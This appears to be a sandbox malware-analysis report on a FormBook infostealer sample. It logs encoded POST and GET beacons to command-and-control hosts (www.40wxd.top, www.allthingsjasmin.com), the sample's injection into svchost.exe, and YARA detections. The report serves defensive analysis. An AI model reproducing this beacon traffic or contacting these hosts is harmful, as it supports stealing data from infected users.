Session ID: 37 | Source: 192.168.2.7:50009 | Destination: 206.119.82.134:80 | PID: 1104 | Process: C:\Program Files (x86)\jiQHbjscaMcKbPOlOroupNlgeKQaKZsecmPTcdBGPKRlFNgULSZwTYQAEfmJOzLaHJAOeFYgauUXuA\uxEGEjhWYrJv.exe
Timestamp | Bytes transferred | Direction | Data
Oct 9, 2024 14:08:39.081228971 CEST | 665 | OUT | POST /0cbg/ HTTP/1.1
                                                                                                                Host: www.40wxd.top
                                                                                                                Accept: */*
                                                                                                                Accept-Language: en-US,en
                                                                                                                Accept-Encoding: gzip, deflate
                                                                                                                Origin: http://www.40wxd.top
                                                                                                                Content-Length: 216
                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                Connection: close
                                                                                                                Cache-Control: no-cache
                                                                                                                Referer: http://www.40wxd.top/0cbg/
                                                                                                                User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; SPH-L710 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.93 Mobile Safari/537.36
                                                                                                                Data Raw: 5a 5a 59 3d 63 63 39 69 78 45 65 6e 50 47 65 6f 41 52 77 75 4a 76 53 66 68 61 37 54 55 6a 64 59 41 47 61 54 70 69 37 72 4a 56 79 41 46 58 79 52 6b 47 54 54 6a 66 58 5a 49 49 54 48 41 4e 76 74 6b 43 30 35 38 6c 55 6d 54 78 66 36 45 76 59 38 6b 48 6a 62 6b 72 4f 47 62 4f 72 43 33 6b 6f 34 2b 39 79 31 77 67 6d 56 77 65 41 74 77 70 37 59 59 54 64 7a 56 46 54 31 49 76 74 77 66 53 4f 50 34 33 67 4d 77 53 2f 35 64 67 35 79 61 30 73 6f 74 76 30 2f 37 31 76 2f 55 5a 30 78 39 6c 48 32 4f 74 46 50 58 32 44 4a 43 6e 50 67 48 58 77 31 4c 71 68 2b 59 33 68 70 2b 46 4a 70 63 63 6f 38 61 45 45 4c 61 79 59 7a 42 77 51 4d 79 34 46 52 58 39 64 69 4b 67 3d 3d
                                                                                                                Data Ascii: ZZY=cc9ixEenPGeoARwuJvSfha7TUjdYAGaTpi7rJVyAFXyRkGTTjfXZIITHANvtkC058lUmTxf6EvY8kHjbkrOGbOrC3ko4+9y1wgmVweAtwp7YYTdzVFT1IvtwfSOP43gMwS/5dg5ya0sotv0/71v/UZ0x9lH2OtFPX2DJCnPgHXw1Lqh+Y3hp+FJpcco8aEELayYzBwQMy4FRX9diKg==
Oct 9, 2024 14:08:39.958683968 CEST | 691 | IN | HTTP/1.1 404 Not Found
                                                                                                                Server: nginx
                                                                                                                Date: Wed, 09 Oct 2024 12:08:39 GMT
                                                                                                                Content-Type: text/html
                                                                                                                Content-Length: 548
                                                                                                                Connection: close
                                                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
                                                                                                                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


Session ID: 38 | Source: 192.168.2.7:50010 | Destination: 206.119.82.134:80 | PID: 1104 | Process: C:\Program Files (x86)\jiQHbjscaMcKbPOlOroupNlgeKQaKZsecmPTcdBGPKRlFNgULSZwTYQAEfmJOzLaHJAOeFYgauUXuA\uxEGEjhWYrJv.exe
Timestamp | Bytes transferred | Direction | Data
Oct 9, 2024 14:08:41.623748064 CEST | 685 | OUT | POST /0cbg/ HTTP/1.1
                                                                                                                Host: www.40wxd.top
                                                                                                                Accept: */*
                                                                                                                Accept-Language: en-US,en
                                                                                                                Accept-Encoding: gzip, deflate
                                                                                                                Origin: http://www.40wxd.top
                                                                                                                Content-Length: 236
                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                Connection: close
                                                                                                                Cache-Control: no-cache
                                                                                                                Referer: http://www.40wxd.top/0cbg/
                                                                                                                User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; SPH-L710 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.93 Mobile Safari/537.36
                                                                                                                Data Raw: 5a 5a 59 3d 63 63 39 69 78 45 65 6e 50 47 65 6f 42 77 67 75 4c 4d 4b 66 77 36 37 55 4b 54 64 59 50 6d 61 58 70 6a 48 72 4a 57 2b 51 46 69 61 52 6c 6d 44 54 67 65 58 5a 4a 49 54 48 4b 74 76 73 72 69 30 45 38 6c 59 75 54 78 6a 36 45 76 63 38 6b 44 76 62 6c 59 57 46 62 65 72 41 2f 45 6f 2b 7a 64 79 31 77 67 6d 56 77 66 6b 58 77 70 7a 59 62 6a 42 7a 55 6e 37 32 4c 76 74 33 57 79 4f 50 38 33 67 51 77 53 2f 62 64 6c 67 58 61 78 6f 6f 74 75 45 2f 2f 78 44 38 64 5a 30 33 77 46 47 45 4e 38 6b 41 58 30 4b 37 48 6d 4c 65 4b 67 6b 4b 48 38 38 63 43 56 74 46 67 55 78 53 59 65 4d 4b 4e 69 5a 2b 59 7a 63 72 4d 53 6b 74 74 50 67 37 61 76 38 6d 63 63 39 53 33 77 64 66 79 71 55 51 46 64 39 4d 58 39 64 69 6c 48 6b 3d
                                                                                                                Data Ascii: ZZY=cc9ixEenPGeoBwguLMKfw67UKTdYPmaXpjHrJW+QFiaRlmDTgeXZJITHKtvsri0E8lYuTxj6Evc8kDvblYWFberA/Eo+zdy1wgmVwfkXwpzYbjBzUn72Lvt3WyOP83gQwS/bdlgXaxootuE//xD8dZ03wFGEN8kAX0K7HmLeKgkKH88cCVtFgUxSYeMKNiZ+YzcrMSkttPg7av8mcc9S3wdfyqUQFd9MX9dilHk=
Oct 9, 2024 14:08:42.498958111 CEST | 691 | IN | HTTP/1.1 404 Not Found
                                                                                                                Server: nginx
                                                                                                                Date: Wed, 09 Oct 2024 12:08:42 GMT
                                                                                                                Content-Type: text/html
                                                                                                                Content-Length: 548
                                                                                                                Connection: close
                                                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
                                                                                                                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


Session ID: 39 | Source: 192.168.2.7:50011 | Destination: 206.119.82.134:80 | PID: 1104 | Process: C:\Program Files (x86)\jiQHbjscaMcKbPOlOroupNlgeKQaKZsecmPTcdBGPKRlFNgULSZwTYQAEfmJOzLaHJAOeFYgauUXuA\uxEGEjhWYrJv.exe
Timestamp | Bytes transferred | Direction | Data
Oct 9, 2024 14:08:44.548331022 CEST | 1698 | OUT | POST /0cbg/ HTTP/1.1
                                                                                                                Host: www.40wxd.top
                                                                                                                Accept: */*
                                                                                                                Accept-Language: en-US,en
                                                                                                                Accept-Encoding: gzip, deflate
                                                                                                                Origin: http://www.40wxd.top
                                                                                                                Content-Length: 1248
                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                Connection: close
                                                                                                                Cache-Control: no-cache
                                                                                                                Referer: http://www.40wxd.top/0cbg/
                                                                                                                User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; SPH-L710 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.93 Mobile Safari/537.36
                                                                                                                Data Raw: 5a 5a 59 3d 63 63 39 69 78 45 65 6e 50 47 65 6f 42 77 67 75 4c 4d 4b 66 77 36 37 55 4b 54 64 59 50 6d 61 58 70 6a 48 72 4a 57 2b 51 46 69 43 52 6b 51 50 54 6e 4e 76 5a 62 34 54 48 4a 74 76 78 72 69 30 6a 38 6c 51 71 54 78 76 71 45 74 55 38 69 6d 7a 62 69 74 36 46 55 65 72 41 67 30 6f 2f 2b 39 7a 74 77 67 57 52 77 66 30 58 77 70 7a 59 62 68 31 7a 58 31 54 32 4e 76 74 77 66 53 4f 4c 34 33 67 73 77 54 58 68 64 6b 56 69 61 69 51 6f 74 4f 55 2f 35 55 76 38 41 70 30 31 31 46 47 63 4e 38 70 41 58 30 58 43 48 6d 76 30 4b 6e 49 4b 48 36 78 59 51 6b 42 56 39 46 4e 4a 61 74 38 38 4e 41 78 44 54 31 55 2f 4c 6c 49 53 6e 34 6f 35 53 50 63 30 65 49 51 76 67 41 6b 73 78 71 59 7a 49 35 73 49 4c 74 74 31 35 41 56 45 6a 75 50 39 52 32 6e 79 64 4a 30 4a 33 62 33 61 33 38 32 63 53 58 53 69 57 77 69 4d 31 64 4e 31 63 6f 48 4c 70 74 4b 45 67 33 4b 39 52 4f 78 67 76 46 77 47 38 75 43 6b 6b 42 74 70 54 38 33 65 48 53 73 4c 75 38 46 45 69 64 44 42 78 63 6c 37 69 39 56 5a 76 78 32 4b 62 47 4f 41 34 43 63 6a 49 74 35 49 6e 2b [TRUNCATED]
                                                                                                                Data Ascii: ZZY=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 [TRUNCATED]


Session ID: 40 | Source: 192.168.2.7:50012 | Destination: 206.119.82.134:80 | PID: 1104 | Process: C:\Program Files (x86)\jiQHbjscaMcKbPOlOroupNlgeKQaKZsecmPTcdBGPKRlFNgULSZwTYQAEfmJOzLaHJAOeFYgauUXuA\uxEGEjhWYrJv.exe
Timestamp | Bytes transferred | Direction | Data
Oct 9, 2024 14:08:47.089133978 CEST | 412 | OUT | GET /0cbg/?ZZY=ReVCyzq7e32zPSksEOCt3pbKcx4rKGTIyRipE0uGIQ28zkTth8noQJXIJc3ts0ISqVogbi/TYpoiqGzNpNOIXMLKx0kCr+Xw6Q+8qepVva7bCGUCYF3oCYt7aX6G3loK+iyEYGVwNCt0&mHm0o=rrqhoH HTTP/1.1
                                                                                                                Host: www.40wxd.top
                                                                                                                Accept: */*
                                                                                                                Accept-Language: en-US,en
                                                                                                                Connection: close
                                                                                                                User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; SPH-L710 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.93 Mobile Safari/537.36
Oct 9, 2024 14:08:47.992333889 CEST | 691 | IN | HTTP/1.1 404 Not Found
                                                                                                                Server: nginx
                                                                                                                Date: Wed, 09 Oct 2024 12:08:47 GMT
                                                                                                                Content-Type: text/html
                                                                                                                Content-Length: 548
                                                                                                                Connection: close
                                                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
                                                                                                                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


Session ID: 41 | Source: 192.168.2.7:50013 | Destination: 3.33.130.190:80 | PID: 1104 | Process: C:\Program Files (x86)\jiQHbjscaMcKbPOlOroupNlgeKQaKZsecmPTcdBGPKRlFNgULSZwTYQAEfmJOzLaHJAOeFYgauUXuA\uxEGEjhWYrJv.exe
Timestamp | Bytes transferred | Direction | Data
Oct 9, 2024 14:08:53.050594091 CEST | 695 | OUT | POST /eysm/ HTTP/1.1
                                                                                                                Host: www.allthingsjasmin.com
                                                                                                                Accept: */*
                                                                                                                Accept-Language: en-US,en
                                                                                                                Accept-Encoding: gzip, deflate
                                                                                                                Origin: http://www.allthingsjasmin.com
                                                                                                                Content-Length: 216
                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                Connection: close
                                                                                                                Cache-Control: no-cache
                                                                                                                Referer: http://www.allthingsjasmin.com/eysm/
                                                                                                                User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; SPH-L710 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.93 Mobile Safari/537.36
                                                                                                                Data Raw: 5a 5a 59 3d 6d 6b 74 47 62 69 64 57 7a 41 47 65 52 62 61 78 68 2f 71 61 41 43 79 38 50 4d 4a 31 72 75 73 67 59 76 51 63 6b 32 67 67 35 47 62 4b 42 61 45 51 69 37 6a 51 33 4c 68 75 4c 6d 70 51 58 41 75 32 68 6b 4f 65 48 31 34 35 54 4d 44 2b 47 30 6c 6d 46 56 4b 47 6d 70 51 73 56 58 35 6d 63 4e 64 4c 74 4b 32 37 52 46 70 6b 5a 33 77 64 56 32 4d 49 4e 63 4e 6a 55 4d 78 48 54 77 62 30 6d 55 33 63 75 32 57 42 73 68 44 75 57 79 38 45 6e 69 72 6f 62 31 6c 76 2f 54 74 6d 4a 56 47 59 6e 6b 61 79 32 47 7a 68 70 36 55 7a 55 6c 74 34 48 4f 4e 75 31 76 66 2b 33 71 45 79 73 6c 66 65 69 4d 37 4d 57 4b 2f 56 4d 36 77 70 39 43 42 45 56 64 49 56 6d 51 3d 3d
                                                                                                                Data Ascii: ZZY=mktGbidWzAGeRbaxh/qaACy8PMJ1rusgYvQck2gg5GbKBaEQi7jQ3LhuLmpQXAu2hkOeH145TMD+G0lmFVKGmpQsVX5mcNdLtK27RFpkZ3wdV2MINcNjUMxHTwb0mU3cu2WBshDuWy8Enirob1lv/TtmJVGYnkay2Gzhp6UzUlt4HONu1vf+3qEyslfeiM7MWK/VM6wp9CBEVdIVmQ==


Session ID: 42 | Source: 192.168.2.7:50014 | Destination: 3.33.130.190:80 | PID: 1104 | Process: C:\Program Files (x86)\jiQHbjscaMcKbPOlOroupNlgeKQaKZsecmPTcdBGPKRlFNgULSZwTYQAEfmJOzLaHJAOeFYgauUXuA\uxEGEjhWYrJv.exe
Timestamp | Bytes transferred | Direction | Data
Oct 9, 2024 14:08:55.593177080 CEST | 715 | OUT | POST /eysm/ HTTP/1.1
                                                                                                                Host: www.allthingsjasmin.com
                                                                                                                Accept: */*
                                                                                                                Accept-Language: en-US,en
                                                                                                                Accept-Encoding: gzip, deflate
                                                                                                                Origin: http://www.allthingsjasmin.com
                                                                                                                Content-Length: 236
                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                Connection: close
                                                                                                                Cache-Control: no-cache
                                                                                                                Referer: http://www.allthingsjasmin.com/eysm/
                                                                                                                User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; SPH-L710 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.93 Mobile Safari/537.36
                                                                                                                Data Raw: 5a 5a 59 3d 6d 6b 74 47 62 69 64 57 7a 41 47 65 44 76 6d 78 79 73 53 61 58 79 79 37 57 38 4a 31 77 2b 73 73 59 76 4d 63 6b 33 6c 37 2b 79 33 4b 42 2b 41 51 6a 35 4c 51 30 4c 68 75 54 57 70 4d 59 67 75 35 68 6b 4c 68 48 77 41 35 54 50 2f 2b 47 78 5a 6d 46 6d 79 5a 30 70 51 71 4e 6e 35 6b 52 74 64 4c 74 4b 32 37 52 46 74 65 5a 33 49 64 57 43 77 49 4c 39 4e 67 64 73 78 47 55 77 62 30 77 6b 33 59 75 32 58 73 73 6c 6a 55 57 77 30 45 6e 69 37 6f 61 6b 6c 73 6d 6a 74 73 57 6c 48 36 6f 55 7a 6a 79 44 58 35 6a 62 63 62 53 79 5a 62 47 34 51 4d 76 4e 54 53 70 37 38 4a 6f 6e 37 6f 31 71 6d 35 55 4c 37 4e 42 59 45 49 69 31 6b 75 59 50 70 52 77 71 43 4b 6a 78 6d 45 68 5a 42 74 2b 6d 6b 67 38 62 37 48 77 37 34 3d
                                                                                                                Data Ascii: ZZY=mktGbidWzAGeDvmxysSaXyy7W8J1w+ssYvMck3l7+y3KB+AQj5LQ0LhuTWpMYgu5hkLhHwA5TP/+GxZmFmyZ0pQqNn5kRtdLtK27RFteZ3IdWCwIL9NgdsxGUwb0wk3Yu2XssljUWw0Eni7oaklsmjtsWlH6oUzjyDX5jbcbSyZbG4QMvNTSp78Jon7o1qm5UL7NBYEIi1kuYPpRwqCKjxmEhZBt+mkg8b7Hw74=


Session ID:43
Source IP:192.168.2.7
Source Port:50015
Destination IP:3.33.130.190
Destination Port:80
PID:1104
Process:C:\Program Files (x86)\jiQHbjscaMcKbPOlOroupNlgeKQaKZsecmPTcdBGPKRlFNgULSZwTYQAEfmJOzLaHJAOeFYgauUXuA\uxEGEjhWYrJv.exe
Timestamp:Oct 9, 2024 14:08:58.138783932 CEST
Bytes transferred:1728
Direction:OUT
Data:
POST /eysm/ HTTP/1.1
Host: www.allthingsjasmin.com
Accept: */*
Accept-Language: en-US,en
Accept-Encoding: gzip, deflate
Origin: http://www.allthingsjasmin.com
Content-Length: 1248
Content-Type: application/x-www-form-urlencoded
Connection: close
Cache-Control: no-cache
Referer: http://www.allthingsjasmin.com/eysm/
User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; SPH-L710 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.93 Mobile Safari/537.36
Data Raw: 5a 5a 59 3d 6d 6b 74 47 62 69 64 57 7a 41 47 65 44 76 6d 78 79 73 53 61 58 79 79 37 57 38 4a 31 77 2b 73 73 59 76 4d 63 6b 33 6c 37 2b 79 2f 4b 41 4c 55 51 69 65 2f 51 31 4c 68 75 61 32 70 50 59 67 75 67 68 6b 79 6f 48 77 45 70 54 4a 37 2b 48 54 68 6d 4d 33 79 5a 75 35 51 71 45 48 35 6c 63 4e 63 54 74 4b 6d 33 52 46 39 65 5a 33 49 64 57 45 55 49 4d 73 4e 67 62 73 78 48 54 77 62 34 6d 55 33 67 75 32 50 53 73 6b 6a 45 57 42 55 45 6b 44 4c 6f 58 79 78 73 75 6a 74 69 56 6c 48 63 6f 55 75 37 79 44 6a 66 6a 62 6f 31 53 31 31 62 48 38 68 54 34 76 4c 4e 31 39 39 55 6a 55 62 30 31 73 72 4a 4d 34 58 36 4c 49 41 63 76 6c 59 59 42 2f 46 44 36 74 44 30 2b 48 57 37 6c 4c 70 72 2b 68 64 38 37 75 72 7a 6d 4e 38 4b 38 4a 6e 4d 31 6b 74 46 6d 41 46 6a 44 59 35 47 52 56 69 45 6b 32 74 68 7a 67 72 79 4c 2f 46 77 5a 42 6b 35 6e 33 6c 45 65 54 38 4a 4e 49 36 75 65 33 2b 30 65 6f 76 6a 52 61 56 51 33 48 6f 72 73 69 53 4d 64 7a 2f 65 66 48 6c 33 43 56 37 55 62 49 37 6c 56 5a 71 35 48 56 59 76 4a 38 56 52 47 71 76 59 43 4c [TRUNCATED]
                                                                                                                Data Ascii: ZZY=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 [TRUNCATED]


Session ID:44
Source IP:192.168.2.7
Source Port:50016
Destination IP:3.33.130.190
Destination Port:80
PID:1104
Process:C:\Program Files (x86)\jiQHbjscaMcKbPOlOroupNlgeKQaKZsecmPTcdBGPKRlFNgULSZwTYQAEfmJOzLaHJAOeFYgauUXuA\uxEGEjhWYrJv.exe
Timestamp:Oct 9, 2024 14:09:00.683294058 CEST
Bytes transferred:422
Direction:OUT
Data:
GET /eysm/?ZZY=rmFmYSV40EyuHaS2kdWsBSatZMcowP18dPlfx0Yf8gPpQKE966Dkx6Jhfns0QUWGli+3EHMWEp7NMhxdNQGBoYEKFyRFG/hWuIrsEVQcMyBNET9pI9FmSsALbFuO7R/DpXmPiDL0RAp8&mHm0o=rrqhoH HTTP/1.1
Host: www.allthingsjasmin.com
Accept: */*
Accept-Language: en-US,en
Connection: close
User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; SPH-L710 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.93 Mobile Safari/537.36
Timestamp:Oct 9, 2024 14:09:01.139355898 CEST
Bytes transferred:412
Direction:IN
Data:
HTTP/1.1 200 OK
Server: openresty
Date: Wed, 09 Oct 2024 12:09:01 GMT
Content-Type: text/html
Content-Length: 272
Connection: close
Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 5a 5a 59 3d 72 6d 46 6d 59 53 56 34 30 45 79 75 48 61 53 32 6b 64 57 73 42 53 61 74 5a 4d 63 6f 77 50 31 38 64 50 6c 66 78 30 59 66 38 67 50 70 51 4b 45 39 36 36 44 6b 78 36 4a 68 66 6e 73 30 51 55 57 47 6c 69 2b 33 45 48 4d 57 45 70 37 4e 4d 68 78 64 4e 51 47 42 6f 59 45 4b 46 79 52 46 47 2f 68 57 75 49 72 73 45 56 51 63 4d 79 42 4e 45 54 39 70 49 39 46 6d 53 73 41 4c 62 46 75 4f 37 52 2f 44 70 58 6d 50 69 44 4c 30 52 41 70 38 26 6d 48 6d 30 6f 3d 72 72 71 68 6f 48 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?ZZY=rmFmYSV40EyuHaS2kdWsBSatZMcowP18dPlfx0Yf8gPpQKE966Dkx6Jhfns0QUWGli+3EHMWEp7NMhxdNQGBoYEKFyRFG/hWuIrsEVQcMyBNET9pI9FmSsALbFuO7R/DpXmPiDL0RAp8&mHm0o=rrqhoH"}</script></head></html>



                                                                                                                Target ID:3
                                                                                                                Start time:08:04:55
                                                                                                                Start date:09/10/2024
                                                                                                                Path:C:\Users\user\Desktop\sa7Bw41TUq.exe
                                                                                                                Wow64 process (32bit):true
                                                                                                                Commandline:"C:\Users\user\Desktop\sa7Bw41TUq.exe"
                                                                                                                Imagebase:0x400000
                                                                                                                File size:1'364'575 bytes
                                                                                                                MD5 hash:6CD77B30F320ED9E0E515073E1175898
                                                                                                                Has elevated privileges:true
                                                                                                                Has administrator privileges:true
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Reputation:low
                                                                                                                Has exited:true

                                                                                                                Target ID:9
                                                                                                                Start time:08:05:03
                                                                                                                Start date:09/10/2024
                                                                                                                Path:C:\Windows\SysWOW64\svchost.exe
                                                                                                                Wow64 process (32bit):true
                                                                                                                Commandline:"C:\Users\user\Desktop\sa7Bw41TUq.exe"
                                                                                                                Imagebase:0x2b0000
                                                                                                                File size:46'504 bytes
                                                                                                                MD5 hash:1ED18311E3DA35942DB37D15FA40CC5B
                                                                                                                Has elevated privileges:true
                                                                                                                Has administrator privileges:true
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Yara matches:
                                                                                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000009.00000002.1688985587.0000000009690000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000009.00000002.1688985587.0000000009690000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000009.00000002.1671982092.00000000067E0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000009.00000002.1671982092.00000000067E0000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000009.00000002.1670445021.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000009.00000002.1670445021.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                Reputation:high
                                                                                                                Has exited:true

                                                                                                                Target ID:11
                                                                                                                Start time:09:58:17
                                                                                                                Start date:09/10/2024
                                                                                                                Path:C:\Program Files (x86)\jiQHbjscaMcKbPOlOroupNlgeKQaKZsecmPTcdBGPKRlFNgULSZwTYQAEfmJOzLaHJAOeFYgauUXuA\uxEGEjhWYrJv.exe
                                                                                                                Wow64 process (32bit):true
                                                                                                                Commandline:"C:\Program Files (x86)\jiQHbjscaMcKbPOlOroupNlgeKQaKZsecmPTcdBGPKRlFNgULSZwTYQAEfmJOzLaHJAOeFYgauUXuA\uxEGEjhWYrJv.exe"
                                                                                                                Imagebase:0xfa0000
                                                                                                                File size:140'800 bytes
                                                                                                                MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                                                Has elevated privileges:false
                                                                                                                Has administrator privileges:false
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Yara matches:
